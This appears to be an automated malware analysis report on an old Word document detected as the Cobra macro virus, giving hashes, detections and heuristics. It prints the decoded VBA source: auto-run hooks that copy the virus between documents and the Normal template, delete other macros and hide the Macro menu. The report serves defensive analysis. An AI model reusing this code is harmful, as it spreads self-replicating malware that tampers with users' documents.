Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 88a29d8835ea18bf…

MALICIOUS

Office (OLE)

Size: 71.0 KB
Created: 2001-02-20 11:24:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 8d7e4e3e808f0a0d8973ff3ce0e68a07
SHA-1: 602213d3b511e66834843077c4078f1025134740
SHA-256: 88a29d8835ea18bf4597add335d6baeb16ee8c7fbe009cb733b794c22cf84d2f
Risk Score: 240

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with multiple signatures, including 'Doc.Trojan.Cobra-1' and 'Doc.Trojan.Cobra-6'. The presence of AutoOpen and AutoClose VBA macros, along with legacy WordBasic markers, indicates that the code is meant to run when the document is opened or closed. The recovered VBA copies and renames its own modules ("Cobra_20C" and "NewCobra") between the active document and the Normal template and hides the Tools > Macro menu, behaviour consistent with a self-propagating Word macro virus rather than a downloader.

Heuristics (5)

  • ClamAV: Doc.Trojan.Cobra-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Cobra-1
  • VBA macros detected (severity: medium; 2 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (severity: high; rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 28352 bytes
SHA-256: 6034d158ddb7de68d0681e73270da722b000f6128b25c39970cd0c1086877fa5
Detection: ClamAV: Doc.Trojan.Cobra-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Cobra_20C"
'Cobra Version 2.0C
Sub FileExit()
Call CobC
Call CobA
Call CobB
Call CobD
WordBasic.FileExit
End Sub
Sub FileOpen()
Dialogs(wdDialogFileOpen).Show
Call CobC
Call CobA
Call CobB
Call CobD
End Sub
Sub AutoClose()
Call CobC
Call CobA
Call CobB
Call CobD
End Sub
Sub AutoOpen()
Call CobC
Call CobA
Call CobB
Call CobD
End Sub
Sub CobA()
On Error Resume Next
Dim CA, CB, CD, CE, CC
CA = False: CB = False: CD = False: CE = False
For Each CC In NormalTemplate.VBProject.VBComponents
If CC.Name <> "NewCobra" And CC.Name <> "Cobra_20C" _
And CC.Name <> "ThisDocument" Then
Application.OrganizerDelete _
Source:=NormalTemplate.FullName, _
Name:=CC.Name, Object:=wdOrganizerObjectProjectItems
End If
Next
For Each CC In ActiveDocument.VBProject.VBComponents
If CC.Name <> "NewCobra" And CC.Name <> "Cobra_20C" _
And CC.Name <> "ThisDocument" And CC.Name <> _
"Reference to Normal" Then
Application.OrganizerDelete Source:=ActiveDocument.FullName, _
Name:=CC.Name, Object:=wdOrganizerObjectProjectItems
End If
Next
For Each CC In ActiveDocument.VBProject.VBComponents
If CC.Name = "Cobra_20C" Then CA = True
Next
For Each CC In ActiveDocument.VBProject.VBComponents
If CC.Name = "NewCobra" Then CB = True
Next
For Each CC In NormalTemplate.VBProject.VBComponents
If CC.Name = "NewCobra" Then CD = True
Next
For Each CC In NormalTemplate.VBProject.VBComponents
If CC.Name = "Cobra_20C" Then CE = True
Next
If CD = False And CE = False And CA = True Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:="Cobra_20C", _
Object:=wdOrganizerObjectProjectItems
End If
If CD = False And CE = False And CB = True Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:="NewCobra", _
Object:=wdOrganizerObjectProjectItems
End If
If CA = True And CB = False Then
Application.OrganizerRename Source:=ActiveDocument.FullName, _
Name:="Cobra_20C", NewName:="NewCobra", _
Object:=wdOrganizerObjectProjectItems
ElseIf CA = False And CB = True Then
Application.OrganizerRename Source:=ActiveDocument.FullName, _
Name:="NewCobra", NewName:="Cobra_20C", _
Object:=wdOrganizerObjectProjectItems
End If
End Sub
Sub CobB()
On Error Resume Next
Dim CA, CB, CD, CE, CC
CA = False: CB = False: CD = False: CE = False
For Each CC In NormalTemplate.VBProject.VBComponents
If CC.Name = "Cobra_20C" Then CA = True
Next
For Each CC In NormalTemplate.VBProject.VBComponents
If CC.Name = "NewCobra" Then CB = True
Next
For Each CC In ActiveDocument.VBProject.VBComponents
If CC.Name = "Cobra_20C" Then CD = True
Next
For Each CC In ActiveDocument.VBProject.VBComponents
If CC.Name = "NewCobra" Then CE = True
Next
If CD = False And CE = False And CA = True Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, _
Name:="Cobra_20C", Object:=wdOrganizerObjectProjectItems
End If
If CD = False And CE = False And CB = True Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, _
Name:="NewCobra", Object:=wdOrganizerObjectProjectItems
End If
If CA = True Then
Application.OrganizerRename Source:=NormalTemplate, _
Name:="Cobra_20C", NewName:="NewCobra", _
Object:=wdOrganizerObjectProjectItems
End If
If CB = True Then
Application.OrganizerRename Source:=NormalTemplate, _
Name:="NewCobra", NewName:="Cobra_20C", _
Object:=wdOrganizerObjectProjectItems
End If
End Sub
Sub CobC()
On Error Resume Next
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls("Macro").Visible = False
CommandBars("Tools").Controls("Macro").Delete
CommandBars("View").Controls("Toolbars").Enabled = False
CommandBars("
... (truncated)